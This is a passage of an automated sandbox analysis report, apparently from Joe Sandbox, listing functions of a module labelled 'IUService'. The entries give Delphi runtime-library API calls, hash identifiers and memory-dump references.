                                                                                                                                            • Instruction ID: 6d55af36f0b63116c874578287824143ce439da2b530ab690ffda4e0f3d9c361
                                                                                                                                            • Opcode Fuzzy Hash: f4ec387a1cd11effdb45d4b7d2cd1ee05245cfe1110f8ce66fbe9255a9397f64
                                                                                                                                            • Instruction Fuzzy Hash: 2921A431284EC447F621B74CECB2BE7B3D1EB663143D04B26E9918B219D664AC4396A5
                                                                                                                                            Function 5000925C Relevance: 9.1, APIs: 6, Instructions: 66COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,?,?,?,?,50008CA1,?,?,?,500056AE,00000000), ref: 50009281
                                                                                                                                            • @System@@ReallocMem$qqrrpvi.RTL120(?,?,?,?,?,50008CA1,?,?,?,500056AE,00000000), ref: 5000929E
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(00000000,?,?,?,?,50008CA1,?,?,?,500056AE,00000000), ref: 500092B7
                                                                                                                                            • @System@@NewAnsiString$qqrius.RTL120(?,?,?,?,50008CA1,?,?,?,500056AE,00000000), ref: 500092C8
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120(?,?,?,?,50008CA1,?,?,?,500056AE,00000000), ref: 500092E0
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(?,?,?,?,50008CA1,?,?,?,500056AE,00000000), ref: 500092E7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$AnsiClr$qqrpvSystem@$FromMem$qqrrpviMove$qqrpxvpviReallocStr$qqrr27StringString$qqriusStringusSystem@%T$us$i0$%x20Unicode
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2700304443-0
                                                                                                                                            • Opcode ID: 8ea68c66dfcedd19741d309cb17a95da812b4b11250355e603ccff5346edb9f3
                                                                                                                                            • Instruction ID: 19fd1448c94dc337e7dea5b0d8d868d31cbff661868f48eb09bfe7f6c9d98fa6
                                                                                                                                            • Opcode Fuzzy Hash: 8ea68c66dfcedd19741d309cb17a95da812b4b11250355e603ccff5346edb9f3
                                                                                                                                            • Instruction Fuzzy Hash: BB1108317016905BFF459A5D9CA4B1EF3EAAFE16017E4427AE504CB369DEB0CC01C396
                                                                                                                                            Function 50024778 Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002482B), ref: 500247B6
                                                                                                                                            • @Sysutils@NextCharIndex$qqrx20System@UnicodeStringi.RTL120(00000000,5002482B), ref: 500247E6
                                                                                                                                            • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,5002482B), ref: 500247F4
                                                                                                                                              • Part of subcall function 500089A4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(50006B15,00000000,50006B69), ref: 500089B7
                                                                                                                                            • @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,5002482B), ref: 500247F9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unicode$System@$StringSystem@@$AnsiFromInternalStr$qqrr20Stringx27System@%T$us$i0$%$CharEnsureIndex$qqrx20Len$qqrx20NextString$qqrr20StringiSysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3710370719-0
                                                                                                                                            • Opcode ID: 8b75fbade8f57a9a3d3cff76574fc1a2f37bac70cd31005b4f4dbd189082e660
                                                                                                                                            • Instruction ID: c71702f12b748d452bae67db58d8c73811d6ffb118b8ba3891e4b339e8c778a6
                                                                                                                                            • Opcode Fuzzy Hash: 8b75fbade8f57a9a3d3cff76574fc1a2f37bac70cd31005b4f4dbd189082e660
                                                                                                                                            • Instruction Fuzzy Hash: ED21E43091A0DAEFDB91DBA8E8525ADB3F4EF06710B6107A2ED10D7261D3705E01E792
                                                                                                                                            Function 50035B58 Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Variants@FindCustomVariantType$qqrxusrp27Variants@TCustomVariantType.RTL120(00000000,50035C10,?,?), ref: 50035B88
                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 50035B9A
                                                                                                                                            • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(?,?,?,00000000,50035C10,?,?), ref: 50035BC6
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,?,?,00000000,50035C10,?,?), ref: 50035BD8
                                                                                                                                            • @Variants@@VarClear$qqrr8TVarData.RTL120(50035BFA,00000000,50035C10,?,?), ref: 50035BED
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Variant$CustomSystem@System@@UnicodeVariants@$Char$qqrr20Clear$qqrr8Copy$qqrx20DataFindFromInitStringiiStringpbTypeType$qqrxusrp27Variants@@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3086420749-0
                                                                                                                                            • Opcode ID: 40e2308c812324028bbe22355ca92887c5f4a01a59f99a618f92d94b6acaf9c2
                                                                                                                                            • Instruction ID: 91e819199a48f9979ee70a8758d56e98f09266c5e3322a99aa85d032a187cd83
                                                                                                                                            • Opcode Fuzzy Hash: 40e2308c812324028bbe22355ca92887c5f4a01a59f99a618f92d94b6acaf9c2
                                                                                                                                            • Instruction Fuzzy Hash: 22218171A046889FDF06CFA4D8519DEF7F9EF89301F5186B6E900A2661D6385E00CA64
                                                                                                                                            Function 5000A0CC Relevance: 9.1, APIs: 6, Instructions: 64COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A0EC
                                                                                                                                            • @System@@ReallocMem$qqrrpvi.RTL120(?,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A10D
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(00000000,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A128
                                                                                                                                            • @System@@NewUnicodeString$qqri.RTL120(00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A137
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120(00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A151
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A158
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$Clr$qqrpvSystem@Unicode$AnsiFromMem$qqrrpviMove$qqrpxvpviReallocStr$qqrr20StringString$qqriStringx27System@%T$us$i0$%
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 459293572-0
                                                                                                                                            • Opcode ID: 4cc0a279c1e311adab8d615449bc2667f6091f2205e3147081700d59042c7b26
                                                                                                                                            • Instruction ID: abed3fd4436abaaa380d7623d8e1add1c8c2b5ba31a90049ac681112dc4d52f4
                                                                                                                                            • Opcode Fuzzy Hash: 4cc0a279c1e311adab8d615449bc2667f6091f2205e3147081700d59042c7b26
                                                                                                                                            • Instruction Fuzzy Hash: 6A11E5327035704FBB049B6D9865799B3EAAFE6511BE48276E104CF31AEA70CC018381
                                                                                                                                            Function 5002E44C Relevance: 9.1, APIs: 6, Instructions: 59COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@LStrAddRef$qqrpv.RTL120 ref: 5002E45A
                                                                                                                                            • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,5002E4EB), ref: 5002E487
                                                                                                                                              • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                                                            • @System@@DynArraySetLength$qqrv.RTL120(?,00000000,5002E4EB), ref: 5002E4A5
                                                                                                                                            • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 5002E4C7
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120 ref: 5002E4D0
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(5002E4F2), ref: 5002E4E5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$System@$AnsiFromStr$qqrr27StringStringusSystem@%T$us$i0$%x20Unicode$Internal$ArrayClr$qqrpvLength$qqrvMove$qqrpxvpviRef$qqrpv
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1261208877-0
                                                                                                                                            • Opcode ID: 4549fb7da4154c2efe271ba38f2e99dccb4cd4c1b1852a6d14b1631e81dae761
                                                                                                                                            • Instruction ID: 3c343618ad32febf82e58c60c3e9db0a7bab7a8f9f77b7682e2089b40a4c880e
                                                                                                                                            • Opcode Fuzzy Hash: 4549fb7da4154c2efe271ba38f2e99dccb4cd4c1b1852a6d14b1631e81dae761
                                                                                                                                            • Instruction Fuzzy Hash: 53119E30702186EFEB14EFB8ED619AEB3F9EB48200BA04276E505D3651E674EE41C695
                                                                                                                                            Function 5001C64C Relevance: 9.1, APIs: 6, Instructions: 58COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@LastDelimiter$qqrx20System@UnicodeStringt1.RTL120(00000000,5001C6EA), ref: 5001C675
                                                                                                                                              • Part of subcall function 5001C3F4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C430
                                                                                                                                              • Part of subcall function 5001C3F4: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C442
                                                                                                                                              • Part of subcall function 5001C3F4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C466
                                                                                                                                              • Part of subcall function 5001C3F4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C48D
                                                                                                                                              • Part of subcall function 5001C3F4: @Sysutils@StrScan$qqrpxbb.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C49C
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C6EA), ref: 5001C699
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @Sysutils@IsDelimiter$qqrx20System@UnicodeStringt1i.RTL120(00000000,5001C6EA), ref: 5001C6BA
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001C6EA), ref: 5001C6CF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$System@@$String$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Sysutils@$Delimiter$qqrx20$Char$qqrx20Copy$qqrx20LastScan$qqrpxbbStringiiStringt1Stringt1i
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3602360137-0
                                                                                                                                            • Opcode ID: b7ecdf829e09be1f06fca1847c704ca9ba1f4837353794b0604a6312a969fd8d
                                                                                                                                            • Instruction ID: b57de0521b8727ab11f2a8e42c2c38b0e85b4303b6796bbee391bef3ecd85a0b
                                                                                                                                            • Opcode Fuzzy Hash: b7ecdf829e09be1f06fca1847c704ca9ba1f4837353794b0604a6312a969fd8d
                                                                                                                                            • Instruction Fuzzy Hash: 8E11A534611188EFDF04DFE8DD52DAD73F8EF99214B6056A6E400D3251DB74DE81D650
                                                                                                                                            Function 5003533C Relevance: 9.1, APIs: 6, Instructions: 56COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 50035362
                                                                                                                                            • @Variants@VarResultCheck$qqrlusus.RTL120(?,?,00000000,500353FB,?,?,?), ref: 50035393
                                                                                                                                            • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(?,?,?,00000000,500353FB,?,?,?), ref: 500353A2
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,?,?,00000000,500353FB,?,?,?), ref: 500353B4
                                                                                                                                              • Part of subcall function 5000A464: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000A525), ref: 5000A4A0
                                                                                                                                              • Part of subcall function 5000A464: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,5000A525), ref: 5000A4F9
                                                                                                                                            • @System@@WStrFromUStr$qqrr17System@WideStringx20System@UnicodeString.RTL120(?,?,?,00000000,500353FB,?,?,?), ref: 500353BE
                                                                                                                                            • @Variants@@VarClear$qqrr8TVarData.RTL120(500353E0,00000000,500353FB,?,?,?), ref: 500353D3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@Unicode$From$String$AnsiCharChar$qqrr20Check$qqrlususClear$qqrr8Copy$qqrx20DataInitInternalLen$qqrr20ResultStr$qqrr17Str$qqrr20StringiiStringpbStringpbiStringx20Stringx27System@%T$us$i0$%VariantVariants@Variants@@Wide
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 586056455-0
                                                                                                                                            • Opcode ID: 91408789b8d8c02b34803f633b3ddfc0a8d103675c021eaf5b909a9d9fe4e244
                                                                                                                                            • Instruction ID: 6b062a9980747ec9e3f71d883036385996f80c363af4a58439cc275360a37b00
                                                                                                                                            • Opcode Fuzzy Hash: 91408789b8d8c02b34803f633b3ddfc0a8d103675c021eaf5b909a9d9fe4e244
                                                                                                                                            • Instruction Fuzzy Hash: BB11E070A00689AFDB11CBA8DC62AEF77BCEB49310F510632F600E3690D630990086A4
                                                                                                                                            Function 5002D8E4 Relevance: 9.1, APIs: 6, Instructions: 56COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@TEncoding@GetByteCount$qqrx20System@UnicodeString.RTL120(00000000,5002D979), ref: 5002D90D
                                                                                                                                              • Part of subcall function 5002D5A8: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002D61B), ref: 5002D5E1
                                                                                                                                              • Part of subcall function 5002D5A8: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5002D61B), ref: 5002D5F4
                                                                                                                                            • @System@@DynArraySetLength$qqrv.RTL120(00000000,00000000,5002D979), ref: 5002D922
                                                                                                                                              • Part of subcall function 5000C0F4: @System@DynArraySetLength$qqrrpvpvipi.RTL120 ref: 5000C0F9
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120 ref: 5002D942
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @Sysutils@TEncoding@GetBytes$qqrx20System@UnicodeStringiir25System@%DynamicArray$tuc%i.RTL120(00000000,?,?), ref: 5002D95E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$StringSystem@@$System@%$AnsiFromStr$qqrr20Stringx27T$us$i0$%$ArrayEncoding@InternalSysutils@$Array$tuc%iByteBytes$qqrx20Char$qqrx20Count$qqrx20DynamicLength$qqrrpvpvipiLength$qqrvStringiir25
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3882313379-0
                                                                                                                                            • Opcode ID: 5b6da02c156a95da7720609a9d09f4bca19e112c761973def9f4e2993511ee2f
                                                                                                                                            • Instruction ID: dc75beec895b85c51d3ff593ca8a9eb71013acc5c9df5cc455d5a5b56faa4565
                                                                                                                                            • Opcode Fuzzy Hash: 5b6da02c156a95da7720609a9d09f4bca19e112c761973def9f4e2993511ee2f
                                                                                                                                            • Instruction Fuzzy Hash: C311AD70701589AFEB00CBA9ED52A6AB7FDDF89700FA0427AF904D3251D671EE42D690
                                                                                                                                            Function 5000A9E0 Relevance: 9.1, APIs: 6, Instructions: 55COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000AA77), ref: 5000AA22
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,5000AA77), ref: 5000AA46
                                                                                                                                            • @System@@WriteLString$qqrr15System@TTextRecx27System@%AnsiStringT$us$i0$%i.RTL120(00000000,5000AA77), ref: 5000AA52
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(5000AA7E), ref: 5000AA69
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
